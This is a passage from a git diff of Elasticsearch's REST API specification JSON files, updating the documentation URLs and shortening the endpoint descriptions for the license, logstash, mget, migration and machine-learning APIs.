a/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json @@ -1,8 +1,8 @@ { "knn_search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html", - "description":"Performs a kNN search." + "url":null, + "description":"Performs a kNN search" }, "stability":"experimental", "deprecated" : { diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json index 5b32a8b9fc6ff..c79d487fdc3f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.delete.json @@ -1,8 +1,8 @@ { "license.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-license.html", - "description":"Deletes licensing information for the cluster" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-delete", + "description":"Delete the license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json index 16f2c086f3d3d..4d8a0cc423196 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get.json @@ -1,8 +1,8 @@ { "license.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-license.html", - "description":"Retrieves licensing information for the cluster" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get", + "description":"Get license information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json index a689daf4fe88a..a7fa72c5a694b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_basic_status.json @@ -1,8 +1,8 @@ { "license.get_basic_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-basic-status.html", - "description":"Retrieves information about the status of the basic license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-basic-status", + "description":"Get the basic license status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json index dffa2932a17f9..be3dcb6ef82a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.get_trial_status.json @@ -1,8 +1,8 @@ { "license.get_trial_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-trial-status.html", - "description":"Retrieves information about the status of the trial license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-trial-status", + "description":"Get the trial status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json index 25c3093fb0da9..e044bf8012856 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post.json @@ -1,8 +1,8 @@ { "license.post":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/update-license.html", - "description":"Updates the license for the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post", + "description":"Update the license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json index a0e6776bdbb32..4677cedc39db3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_basic.json @@ -1,8 +1,8 @@ { "license.post_start_basic":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-basic.html", - "description":"Starts an indefinite basic license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-basic", + "description":"Start a basic license" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json index 9fb85807d611f..406e11e5e1eb1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/license.post_start_trial.json @@ -1,8 +1,8 @@ { "license.post_start_trial":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trial.html", - "description":"starts a limited time trial license." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-trial", + "description":"Start a trial" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json index 8650f5f7cac3c..7434e4a168ff7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.delete_pipeline.json @@ -1,8 +1,8 @@ { "logstash.delete_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-delete-pipeline.html", - "description":"Deletes Logstash Pipelines used by Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-delete-pipeline", + "description":"Delete a Logstash pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json index 201721268588a..7c41efdc27fa9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.get_pipeline.json @@ -1,8 +1,8 @@ { "logstash.get_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-get-pipeline.html", - "description":"Retrieves Logstash Pipelines used by Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-get-pipeline", + "description":"Get Logstash pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json index e8ec9b0d99178..936b0728a7aa7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/logstash.put_pipeline.json @@ -1,8 +1,8 @@ { "logstash.put_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/logstash-api-put-pipeline.html", - "description":"Adds and updates Logstash Pipelines used for Central Management" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-put-pipeline", + "description":"Create or update a Logstash pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json b/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json index 28542bd91a7cb..dafc12b278247 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/mget.json @@ -1,8 +1,8 @@ { "mget":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-multi-get.html", - "description":"Allows to get multiple documents in one request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mget", + "description":"Get multiple documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json index 6906cacc2bdaf..a98913ee69cdb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.deprecations.json @@ -1,8 +1,8 @@ { "migration.deprecations":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-deprecation.html", - "description":"Retrieves information about different cluster, node, and index level settings that use deprecated features that will be removed or changed in the next major version." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-deprecations", + "description":"Get deprecation information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json index 27e142c6f3462..f4a7e2fa1fe65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.get_feature_upgrade_status.json @@ -1,8 +1,8 @@ { "migration.get_feature_upgrade_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-feature-upgrade.html", - "description":"Find out whether system features need to be upgraded or not" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status", + "description":"Get feature migration information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json index 6bafdfc69fde7..2bc5066b7a0ee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/migration.post_feature_upgrade.json @@ -1,8 +1,8 @@ { "migration.post_feature_upgrade":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/migration-api-feature-upgrade.html", - "description":"Begin upgrades for system features" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status", + "description":"Start the feature migration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json index 81f396a30b366..c68e43fb70df5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.clear_trained_model_deployment_cache.json @@ -1,8 +1,8 @@ { "ml.clear_trained_model_deployment_cache":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/clear-trained-model-deployment-cache.html", - "description":"Clear the cached results from a trained model deployment" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-clear-trained-model-deployment-cache", + "description":"Clear trained model deployment cache" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json index 4361439579da8..4782dd01867f9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.close_job.json @@ -1,8 +1,8 @@ { "ml.close_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html", - "description":"Closes one or more anomaly detection jobs. A job can be opened and closed multiple times throughout its lifecycle." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-close-job", + "description":"Close anomaly detection jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json index b224c870ed426..2d9937b622b02 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar.json @@ -1,8 +1,8 @@ { "ml.delete_calendar":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar.html", - "description":"Deletes a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar", + "description":"Delete a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json index 92fe4ea3486b9..3a00fd1d1f840 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_event.json @@ -1,8 +1,8 @@ { "ml.delete_calendar_event":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar-event.html", - "description":"Deletes scheduled events from a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-event", + "description":"Delete events from a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json index e122c41f20858..ef25e742e0c5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_calendar_job.json @@ -1,8 +1,8 @@ { "ml.delete_calendar_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-calendar-job.html", - "description":"Deletes anomaly detection jobs from a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-job", + "description":"Delete anomaly jobs from a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json index 353f9a09023bc..cd7c65cd5617c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.delete_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-dfanalytics.html", - "description":"Deletes an existing data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-data-frame-analytics", + "description":"Delete a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json index 8cff1cbf83e58..f3aaf05a371dc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_datafeed.json @@ -1,8 +1,8 @@ { "ml.delete_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html", - "description":"Deletes an existing datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-datafeed", + "description":"Delete a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json index f2e8446934c1a..94045a1d9dd95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_expired_data.json @@ -1,8 +1,8 @@ { "ml.delete_expired_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-expired-data.html", - "description":"Deletes expired and unused machine learning data." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data", + "description":"Delete expired ML data" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json index e275a9dc9ede8..7565e9c0e98fc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_filter.json @@ -1,8 +1,8 @@ { "ml.delete_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-filter.html", - "description":"Deletes a filter." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-filter", + "description":"Delete a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json index 45235187b3550..b42f312d4cc1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_forecast.json @@ -1,8 +1,8 @@ { "ml.delete_forecast":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-forecast.html", - "description":"Deletes forecasts from a machine learning job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-forecast", + "description":"Delete forecasts from a job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json index 696c0082d11f8..34d2bcd7732bf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_job.json @@ -1,8 +1,8 @@ { "ml.delete_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html", - "description":"Deletes an existing anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-job", + "description":"Delete an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json index 499cb3b19bbbd..da2958e59efec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.delete_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html", - "description":"Deletes an existing model snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-model-snapshot", + "description":"Delete a model snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json index 5d63138c320ed..1f13c27527815 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model.json @@ -1,8 +1,8 @@ { "ml.delete_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-trained-models.html", - "description":"Deletes an existing trained inference model that is currently not referenced by an ingest pipeline." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model", + "description":"Delete an unreferenced trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json index 8c2142260fbed..14c31c6c087ae 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.delete_trained_model_alias.json @@ -1,8 +1,8 @@ { "ml.delete_trained_model_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-trained-models-aliases.html", - "description":"Deletes a model alias that refers to the trained model" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model-alias", + "description":"Delete a trained model alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json index 75bff3b52d99a..e94a12f861e03 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.estimate_model_memory.json @@ -1,8 +1,8 @@ { "ml.estimate_model_memory":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-apis.html", - "description":"Estimates the model memory" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-estimate-model-memory", + "description":"Estimate job model memory usage" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json index d2c39612b866c..073fe8028091c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.evaluate_data_frame.json @@ -1,8 +1,8 @@ { "ml.evaluate_data_frame":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/evaluate-dfanalytics.html", - "description":"Evaluates the data frame analytics for an annotated index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-evaluate-data-frame", + "description":"Evaluate data frame analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json index 3fd82e3603d08..f87653eea45eb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.explain_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.explain_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/explain-dfanalytics.html", - "description":"Explains a data frame analytics config." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-explain-data-frame-analytics", + "description":"Explain data frame analytics config" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json index 71abaf9528183..92ee21828e02d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.flush_job.json @@ -1,8 +1,8 @@ { "ml.flush_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html", - "description":"Forces any buffered data to be processed by the job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-flush-job", + "description":"Force buffered data to be processed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json index a468741815b12..546444d05ee74 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.forecast.json @@ -1,8 +1,8 @@ { "ml.forecast":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-forecast.html", - "description":"Predicts the future behavior of a time series by using its historical behavior." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-forecast", + "description":"Predict future behavior of a time series" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json index dcf9a2cbe3067..15939f86aa69e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_buckets.json @@ -1,8 +1,8 @@ { "ml.get_buckets":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html", - "description":"Retrieves anomaly detection job results for one or more buckets." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-buckets", + "description":"Get anomaly detection job results for buckets" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json index 0b3435ff3f935..81ef3c27d0814 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendar_events.json @@ -1,8 +1,8 @@ { "ml.get_calendar_events":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-calendar-event.html", - "description":"Retrieves information about the scheduled events in calendars." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendar-events", + "description":"Get info about events in calendars" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json index d7666f69d1da9..6c21b9ba7aa46 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_calendars.json @@ -1,8 +1,8 @@ { "ml.get_calendars":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-calendar.html", - "description":"Retrieves configuration information for calendars." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendars", + "description":"Get calendar configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json index 69f8dd74e3d55..e78abfe87b8e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_categories.json @@ -1,8 +1,8 @@ { "ml.get_categories":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html", - "description":"Retrieves anomaly detection job results for one or more categories." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-categories", + "description":"Get anomaly detection job results for categories" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json index aa1b3e5dea7a5..1afc924a5a919 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.get_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-dfanalytics.html", - "description":"Retrieves configuration information for data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analytics", + "description":"Get data frame analytics job configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json index f62d36d1c5bd6..ccdf1eb57e68b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_data_frame_analytics_stats.json @@ -1,8 +1,8 @@ { "ml.get_data_frame_analytics_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-dfanalytics-stats.html", - "description":"Retrieves usage information for data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analytics-stats", + "description":"Get data frame analytics job stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json index a7d3693bc2274..cf79250fbbe0b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeed_stats.json @@ -1,8 +1,8 @@ { "ml.get_datafeed_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html", - "description":"Retrieves usage information for datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeed-stats", + "description":"Get datafeed stats" }, "stability":"stable", "visibility":"public", diff 